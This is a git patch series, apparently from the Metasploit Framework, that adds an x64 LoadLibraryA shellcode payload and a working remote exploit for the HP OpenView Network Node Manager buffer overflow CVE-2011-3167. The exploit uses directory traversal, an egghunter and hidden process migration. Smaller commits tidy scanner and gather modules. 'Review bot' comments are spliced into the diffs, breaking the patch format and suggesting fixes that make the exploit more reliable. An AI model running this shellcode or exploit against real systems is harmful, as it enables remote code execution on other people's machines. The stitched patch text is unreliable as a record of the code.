From 9fe18cdc8671adfcf04ffbb0707a515eb9e0451f Mon Sep 17 00:00:00 2001
From: scriptjunkie
Date: Tue, 17 Jan 2012 21:16:26 -0600
Subject: [PATCH 1/6] Add x64 LoadLibraryA payload. Because it should exist.
---
 .../x64/src/single/single_loadlibrary.asm | 24 ++++++
 .../singles/windows/x64/loadlibrary.rb | 74 +++++++++++++++++++
 2 files changed, 98 insertions(+)
 create mode 100644 external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm
 create mode 100644 modules/payloads/singles/windows/x64/loadlibrary.rb
diff --git a/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm b/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm
new file mode 100644
index 0000000000..5ba96f0f7d
--- /dev/null
+++ b/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm
@@ -0,0 +1,24 @@
+;-----------------------------------------------------------------------------;
+; Author: scriptjunkie (scriptjunkie[at]scriptjunkie[dot]us),
+; Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2003
+; 17 Jan 2012
+;-----------------------------------------------------------------------------;
+
+[BITS 64]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+ pop rbp ; Pop off the address of 'api_call' for calling later.
+ lea rcx, [ebp+libpath-delta]
+ mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call rbp ; LoadLibraryA( &libpath );
+ ; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
+libpath:
+ ;db "funkystuff.dll", 0
diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb
new file mode 100644
index 0000000000..e1918b5db2
--- /dev/null
+++ b/modules/payloads/singles/windows/x64/loadlibrary.rb
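Review bot: `lea rcx, [ebp+libpath-delta]` uses the 32-bit `ebp` inside a `[BITS 64]` block, so the assembler emits an address-size override and only the low 32 bits of the api_call address held in rbp reach rcx; the assembled bytes in the loadlibrary.rb hunk show exactly that (`\x67\x48\x8D\x8D\x00\x01\x00\x00`). The path pointer passed to LoadLibraryA is therefore only correct while the payload happens to be mapped below 4 GB, which a 64-bit process does not guarantee. Change the line to `lea rcx, [rbp+libpath-delta]` and regenerate the 'Payload' blob in modules/payloads/singles/windows/x64/loadlibrary.rb; dropping the prefix byte shortens the blob by one, so the EXITFUNC entry in 'Offsets' (currently 228) has to move as well. A trailing comment such as `; RCX = &libpath, first argument to LoadLibraryA` would make the line self-explanatory like its neighbours.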
@@ -0,0 +1,74 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Payload::Single + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows x64 LoadLibrary Path', + 'Version' => '$Revision$', + 'Description' => 'Load an arbitrary x64 library path', + 'Author' => [ 'scriptjunkie', 'sf' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86_64, + 'PayloadCompat' => + { + 'Convention' => '-http -https', + }, + 'Payload' => + { + 'Offsets' => + { + 'EXITFUNC' => [ 228, 'V' ] + }, + 'Payload' => + "\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" + + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" + + "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" + + "\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" + + "\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" + + "\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" + + "\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" + + "\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" + + "\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" + + "\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" + + "\xFF\xFF\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00\x41\xBA\x4C\x77\x26" + + "\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5" + + "\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13" + + 
"\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5" + } + )) + register_options( + [ + OptString.new('DLL', [ true, "The library path to load (UNC is OK)" ]), + ], self.class ) + end + + def generate + return super + dll_string + "\x00" + end + + def dll_string + return datastore['DLL'] || '' + end + +end From 955b02e22712a2478b9dbac8a28bca85d6cc4b73 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 18 Jan 2012 11:19:37 -0600 Subject: [PATCH 2/6] Allow 'port' option in module searching (idea originally from Brandon Perry's blog) --- lib/msf/core/module.rb | 2 ++ lib/msf/ui/console/command_dispatcher/core.rb | 1 + 2 files changed, 3 insertions(+) diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 347cc1cc0f..d8c3396656 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -690,6 +690,8 @@ class Module if not match and self.respond_to?(:targets) and self.targets match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r } end + when 'port' + match = [t,w] if self.datastore['RPORT'].to_s =~ r when 'type' match = [t,w] if (w == "exploit" and is_exploit) match = [t,w] if (w == "auxiliary" and is_auxiliary) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index eb1dd06ba0..faf00bff15 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1285,6 +1285,7 @@ class Core "name" => "Modules with a matching descriptive name", "path" => "Modules with a matching path or reference name", "platform" => "Modules affecting this platform", + "port" => "Modules with a matching remote port", "type" => "Modules of a specific type (exploit, auxiliary, or post)", "app" => "Modules that are client or server attacks", "author" => "Modules written by this author", From 064a71fb1df20d8fa2a28d38e23cc0848155e2b7 Mon Sep 17 00:00:00 2001 
From: sinn3r
Date: Wed, 18 Jan 2012 12:05:18 -0600
Subject: [PATCH 3/6] Add CVE-2011-3167 HP OpenView NNM exploit (Feature #6245)
---
 .../http/hp_nnm_ovbuildpath_textfile.rb | 277 ++++++++++++++++++
 1 file changed, 277 insertions(+)
 create mode 100644 modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
new file mode 100644
index 0000000000..ef400d55fa
--- /dev/null
+++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
@@ -0,0 +1,277 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Egghunter + + def initialize(info={}) + super(update_info(info, + 'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in HP OpenView Network Node + Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long + 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can + cause a stack-based buffer overflow and execute arbitrary code. + + The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There + are no stack cookies, so exploitation is achieved by overwriting the saved return + address. + + The vulnerability is due to the use of the function "_OVConcatPath" which finally + uses "strcat" in a insecure way. User controlled data is concatenated to a string + which contains the OpenView installation path. + + To achieve reliable exploitation a directory traversal in OpenView5.exe + (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation + path. If the installation path cannot be guessed the default installation path + is used. 
+ } ,
+ 'Author' =>
+ [
+ 'Anyway ', # Vulnerability Discovery
+ 'juan vazquez', # Metasploit module
+ 'sinn3r' # Metasploit fu
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2011-3167' ],
+ [ 'OSVDB', '76775' ],
+ [ 'BID', '50471' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],
+ [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 950,
+ 'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"),
+ 'DisableNops' => true,
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'EDI' # Egghunter jmp edi
+ }
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',
+ # Patches installed:
+ # * ECS_00048
+ # * NNM_01128
+ # * NNM_01172
+ # * NNM_01187
+ {
+ 'Offset' => 1067,
+ 'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)
+ 'JmpESP' => 0x5a4251c5, # call esp - in ov.dll
+ 'EggAdjust' => 4,
+ 'ReadableAddress' => 0x5a466930 # ov.dll
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 01 2011'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ ], self.class)
+ end
+
+ # The following code allows to migrate if having into account
+ # that over Windows XP permissions aren't granted on %windir%\system32
+ #
+ # Code ripped from "modules/post/windows/manage/migrate.rb". 
See it
+ # for more information
+ def on_new_session(client)
+
+ if client.type != "meterpreter"
+ print_error("NOTE: you must use a meterpreter payload in order to process migration.")
+ return
+ end
+
+ client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+
+ # Select path and executable to run depending the architecture
+ # and the operating system
+ if client.sys.config.sysinfo["OS"] =~ /Windows XP/
+ windir = client.fs.file.expand_path("%ProgramFiles%")
+ cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
+ else # Windows 2000
+ windir = client.fs.file.expand_path("%windir%")
+ if client.sys.config.sysinfo['Architecture'] =~ /x86/
+ cmd = "#{windir}\\System32\\notepad.exe"
+ else
+ cmd = "#{windir}\\Sysnative\\notepad.exe"
+ end
+ end
+
+ # run hidden
+ print_status("Spawning #{cmd.split("\\").last} process to migrate to")
+ proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
+ target_pid = proc.pid
+
+ begin
+ print_good("Migrating to #{target_pid}")
+ client.core.migrate(target_pid)
+ print_good("Successfully migrated to process #{target_pid}")
+ rescue ::Exception => e
+ print_error("Could not migrate in to process.")
+ print_error(e.to_s)
+ end
+
+ end
+
+ # Tries to guess the HP OpenView install dir via the Directory traversal identified
+ # by OSVDB 44359.
+ # If OSVDB 44359 doesn't allow to retrieve the installation path the default one
+ # (C:\Program Files\HP OpenView\) is used. 
+ # Directory Traversal used:
+ # http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log
+ def get_install_path
+
+ cgi = '/OvCgi/OpenView5.exe'
+ web_session = rand_text_numeric(3)
+ my_cookie = "OvOSLocale=English_United States.1252; "
+ my_cookie << "OvAcceptLang=en-US; "
+ my_cookie << "OvJavaLocale=en_US.Cp1252; "
+ my_cookie << "OvWebSession=#{web_session}:AnyUser:"
+
+ payload = "../../../log/setup.log"
+ res = send_request_cgi({
+ 'uri' => cgi,
+ 'cookie' => my_cookie,
+ 'method' => "GET",
+ 'vars_get' =>
+ {
+ 'Target' => "Main",
+ 'Scope' => "Snmp",
+ 'Action' => payload
+ }
+ }, 5)
+
+ installation_path = ""
+ if res and res.code == 200 and
+ res.body =~ /([A-Z]:\\.*\\)log/
+ print_status("Installation Path Found in #{$1}")
+ installation_path = $1
+ else
+ print_status("Installation Path Not Found using the default")
+ installation_path = "C:\\Program Files\\HP OpenView\\"
+ end
+
+ return installation_path
+ end
+
+ def exploit
+ print_status("Trying target #{target.name}...")
+
+ install_path = get_install_path
+ install_path << "help\\English_United States.1252"
+
+ eggoptions = {
+ :checksum => true,
+ }
+ hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+
+ [ 'x86/alpha_mixed'].each { |name|
+ enc = framework.encoders.create(name)
+ if name =~/alpha/
+ # If control is transferred to the decoder via "call esp" BufferOfset
+ # shoulds be adjusted. 
+ if target["EggAdjust"] and target["EggAdjust"] > 0
+ enc_options = {
+ 'BufferRegister' => 'ESP',
+ 'BufferOffset' => target["EggAdjust"]
+ }
+ enc.datastore.import_options_from_hash(enc_options)
+ else
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
+ end
+ end
+ hunter = enc.encode(hunter, nil, nil, platform)
+ }
+
+ offset = target['Offset'] - install_path.length - egg.length
+
+ my_payload = egg
+ my_payload << rand_text_alphanumeric(offset)
+ my_payload << [target.ret].pack("V")
+ my_payload << rand_text_alphanumeric(4) # Padding
+ my_payload << [target["ReadableAddress"]].pack("V")
+ my_payload << [target["JmpESP"]].pack("V")
+ my_payload << hunter
+
+ buf = "-textFile+#{my_payload}+++++++++++++++++++++++"
+ buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++"
+ buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++"
+ buf << "-dataLine+2+"
+ buf << "-commandTitle+%22Services%22+%09%09++++++"
+ buf << "-iconName+%22Services%22+++++++++++++++++++++++"
+ buf << "-cmd+rnetstat+"
+ buf << "-S"
+
+ web_session = rand_text_numeric(3)
+ my_cookie = "OvOSLocale=English_United States.1252; "
+ my_cookie << "OvAcceptLang=en-US; "
+ my_cookie << "OvJavaLocale=en_US.Cp1252; "
+ my_cookie << "OvWebSession=#{web_session}:AnyUser:"
+
+ cgi = '/OvCgi/webappmon.exe'
+
+ res = send_request_cgi({
+ 'uri' => cgi,
+ 'cookie' => my_cookie,
+ 'method' => "POST",
+ 'vars_post' =>
+ {
+ 'ins' => 'nowait',
+ 'sel' => rand_text_alphanumeric(15),
+ 'app' => 'IP Tables',
+ 'act' => 'Services',
+ 'help' => '',
+ 'cache' => rand_text_numeric(4)
+ },
+ 'data' => "arg=#{buf}" # Avoid uri encoding
+ }, 3)
+
+ if res and res.code != 502
+ print_error("Eek! 
We weren't expecting a response, but we got one")
+ if datastore['DEBUG']
+ print_line()
+ print_error(res.inspect)
+ end
+ end
+
+ handler
+
+ end
+
+end
+
+=begin
+
+* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3
+
+meterpreter > run post/windows/manage/migrate
+
+[*] Running module against HOME-F006222D6C
+[*] Current server process: webappmon.exe (7064)
+[*] Spawning notepad.exe process to migrate to
+[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
+[-] Call stack:
+[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
+[-] (eval):80:in `create_temp_proc'
+[-] (eval):49:in `run'
+=end
\ No newline at end of file
From d6e8f0b54d7593620cfc479f5fe2b63b3b6f98fb Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 18 Jan 2012 13:33:27 -0600
Subject: [PATCH 4/6] Add Felipe as an author (plus a reference) because looks like the PoC originally came from him.
---
 modules/exploits/windows/fileformat/adobe_reader_u3d.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
index ce555037e8..8ebc891e82 100644
--- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
+++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Author' =>
 [
+ 'Felipe Andres Manzano', #Original poc (@feliam)
 'sinn3r',
 'juan vazquez',
 'jduck' 
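Review bot: `rescue ::Exception => e` in on_new_session catches everything, including Interrupt and SystemExit, and reports it as a failed migration; `rescue ::StandardError => e` (or the specific Rex request error the =begin block shows) keeps Ctrl-C and shutdown working while still handling the real failure. In `exploit`, `offset = target['Offset'] - install_path.length - egg.length` is used by `rand_text_alphanumeric(offset)` with no check, so a disclosed install path longer than the default pushes it negative and the return address is laid out wrong with no diagnostic; a guard such as `if offset < 0 then print_error("Install path too long for this target"); return; end` before the payload is built would make that failure visible. `datastore['DEBUG']` is read in the response branch but no DEBUG option is registered in this hunk, so that code only runs when the value is set globally, which deserves either an `OptBool.new('DEBUG', ...)` in register_options or a comment saying so. Minor style points in the same function: the local `proc` shadows Kernel#proc, and `$1` is read twice in get_install_path where `Regexp.last_match(1)` captured once would be clearer.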
@@ -40,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
 [ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
 [ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
+ [ 'URL', 'https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0'], #Original PoC
 [ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
 ],
 'DefaultOptions' =>
From ad6f8257e170b81e2588093569b9e804a9a31d38 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Wed, 18 Jan 2012 15:01:00 -0600
Subject: [PATCH 5/6] MSFTidy fixes.
---
 modules/auxiliary/scanner/mssql/mssql_schemadump.rb | 9 +++++----
 modules/auxiliary/scanner/mysql/mysql_schemadump.rb | 4 ++--
 .../auxiliary/scanner/postgres/postgres_schemadump.rb | 3 +--
 modules/exploits/osx/browser/mozilla_mchannel.rb | 2 +-
 modules/post/windows/gather/enum_artifacts.rb | 8 ++++----
 5 files changed, 13 insertions(+), 13 deletions(-)
diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb
index 50a4879e65..707db19602 100644
--- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb
@@ -83,17 +83,17 @@ class Metasploit3 < Msf::Auxiliary
 unless tmp_tblnames.nil?
 tmp_db['DBName']= dbname[0]
 tmp_db['Tables'] = []
- tmp_tblnames.each do |tblname|
+ tmp_tblnames.each do |tblname|
 next if tblname[0].nil?
 tmp_tbl = {}
- tmp_tbl['TableName'] = tblname[0]
+ tmp_tbl['TableName'] = tblname[0]
 tmp_tbl['Columns'] = []
 tmp_columns = get_columns(dbname[0], tblname[1])
 unless tmp_columns.nil?
 tmp_columns.each do |column|
- next if column[0].nil?
+ next if column[0].nil?
 tmp_column = {}
- tmp_column['ColumnName'] = column[0]
+ tmp_column['ColumnName'] = column[0]
 tmp_column['ColumnType'] = column[1]
 tmp_column['ColumnLength'] = column[2]
 tmp_tbl['Columns'] << tmp_column
@@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
 return results
 end
+ # TODO: This should be split up, I fear nil problems in these query/response parsings
 def get_columns(db_name, table_id)
 results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows]
 return results
diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb
index ccc4f83046..21ba20b60a 100644
--- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
 'Name' => 'MYSQL Schema Dump',
 'Version' => '$Revision$',
 'Description' => %Q{
- This module extracts the schema information from a
+ This module extracts the schema information from a
 MySQL DB server.
 },
 'Author' => ['TheLightCosine '],
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
 unless tmp_clmnames.nil? or tmp_clmnames.empty?
 tmp_clmnames.each do |column|
 tmp_column = {}
- tmp_column['ColumnName'] = column[0]
+ tmp_column['ColumnName'] = column[0]
 tmp_column['ColumnType'] = column[1]
 tmp_tbl['Columns'] << tmp_column
 end 
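Review bot: The new TODO records a worry rather than the concrete hazard: `mssql_query(...)[:rows]` indexes the query result directly, so if mssql_query can return nil or something without `:rows`, get_columns raises instead of returning the nil that the caller in the first hunk (`unless tmp_columns.nil?`) is written to handle. Rewording it as `# TODO: guard the mssql_query result before [:rows] so callers see nil rather than a NoMethodError` tells the next reader what to fix. The same query interpolates `db_name` and `table_id` straight into T-SQL; in the first hunk both come from the server's own earlier responses, so a database name with spaces or quotes breaks the statement, and bracket-quoting the identifier (`[#{db_name}]..syscolumns`) is cheap insurance. get_columns' closing `end` lies outside the hunk.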
diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb
index 8810322897..9568322d5d 100644
--- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb
+++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
 'Name' => 'Postgres Schema Dump',
 'Version' => '$Revision$',
 'Description' => %Q{
- This module extracts the schema information from a
+ This module extracts the schema information from a
 Postgres server.
 },
 'Author' => ['TheLightCosine '],
@@ -117,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary
 when :complete
 return res[:complete].rows
 end
-
 end
diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb
index 70ed1a5adb..5d49e4c115 100644
--- a/modules/exploits/osx/browser/mozilla_mchannel.rb
+++ b/modules/exploits/osx/browser/mozilla_mchannel.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
 'Description' => %q{
- This module exploits an use after free vulnerability in Mozilla
+ This module exploits a use-after-free vulnerability in Mozilla
 Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs
diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb
index 3721a14853..2be2341960 100644
--- a/modules/post/windows/gather/enum_artifacts.rb
+++ b/modules/post/windows/gather/enum_artifacts.rb
@@ -15,12 +15,12 @@ class Metasploit3 < Msf::Post
 include Msf::Auxiliary::Report
 include Msf::Post::File
 include Msf::Post::Windows::Registry
-
+
 def initialize(info={})
 super( update_info( info,
 'Name' => 'Windows File and Registry Artifacts Enumeration',
 'Description' => %q{
- This module will check the file system and registry for particular artifacts. The
+ This module will check the file system and registry for particular artifacts. The
 list of artifacts is read from data/post/artifacts or a user specified file. Any matches are written to the loot.
 },
 'License' => MSF_LICENSE,
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
 # Start enumerating
 print_status("Processing artifacts file...")
- file = ::File.open(filename, "r")
+ file = ::File.open(filename, "rb")
 file.each_line do |line|
 line.strip!
 next if line.length < 1
@@ -103,4 +103,4 @@ end
 =begin
 To-do:
 Use CSV or yaml format to store enum_artifacts_list.txt
-=end
\ No newline at end of file
+=end
From bb035bfec2e8fd2df4004b57c4d6b41ac1b79c25 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 18 Jan 2012 15:05:39 -0600
Subject: [PATCH 6/6] Fix up API option names so they can be set globally
---
 modules/auxiliary/gather/corpwatch_lookup_name.rb | 4 ++--
 modules/auxiliary/gather/shodan_search.rb | 4 ++--
 modules/auxiliary/scanner/http/httpbl_lookup.rb | 4 ++--
 3 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb
index 503bbe0f54..4739a8e7c0 100644
--- a/modules/auxiliary/gather/corpwatch_lookup_name.rb
+++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb
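Review bot: `file = ::File.open(filename, "rb")` is never closed within the hunk — there is no block form and no ensure — so the handle stays open until garbage collection, and an exception inside `file.each_line` leaks it outright; `::File.open(filename, "rb") do |file|` wrapping the `each_line` loop closes it on every path. Switching to binary mode presumably also makes each `line` an ASCII-8BIT string, so any comparison against UTF-8 literals further down the method should be re-checked. A comment on the open, `# "rb": read the artifact list byte-for-byte so CRLF and encoding quirks don't alter paths`, would record why the mode changed. The enclosing method starts and ends outside this hunk.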
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
 OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
 OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
- OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
+ OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
 ], self.class)
 deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
 {
 'company_name' => datastore['COMPANY_NAME'],
 'limit' => datastore['LIMIT'],
- 'key' => datastore['API_KEY']
+ 'key' => datastore['CORPWATCH_APIKEY']
 }
 }, 25)
diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb
index 7fe22f73d6..f8a89fa433 100644
--- a/modules/auxiliary/gather/shodan_search.rb
+++ b/modules/auxiliary/gather/shodan_search.rb
@@ -45,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary
 register_options(
 [
- OptString.new('APIKEY', [true, "The SHODAN API key"]),
+ OptString.new('SHODAN_APIKEY', [true, "The SHODAN API key"]),
 OptString.new('QUERY', [true, "Keywords you want to search for"]),
 OptString.new('OUTFILE', [false, "A filename to store the list of IPs"]),
 OptBool.new('DATABASE', [false, "Add search results to the database", false]),
@@ -89,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
 def run
 # create our Shodan request parameters
 query = datastore['QUERY']
- apikey = datastore['APIKEY']
+ apikey = datastore['SHODAN_APIKEY']
 @res = Net::DNS::Resolver.new()
 dns_query = @res.query("#{datastore['VHOST']}", "A")
diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb
index 430df3574b..5342aaf2ce 100644
--- a/modules/auxiliary/scanner/http/httpbl_lookup.rb
+++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
 register_options(
 [
 # OptAddressRange.new('RHOSTS', [false, "The target address, range, or CIDR identifier"]),
- OptString.new('APIKEY', [ true, "Your HTTP:BL api key"])
+ OptString.new('HTTPBL_APIKEY', [ true, "Your HTTP:BL api key"])
 ], self.class)
 end
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 def resolve(ip)
 results = ''
- apikey = datastore['apikey']
+ apikey = datastore['HTTPBL_APIKEY']
 query = apikey + '.' + ip.split('.').reverse.join('.') + '.dnsbl.httpbl.org'
 begin
 results = Resolv::DNS.new.getaddress(query).to_s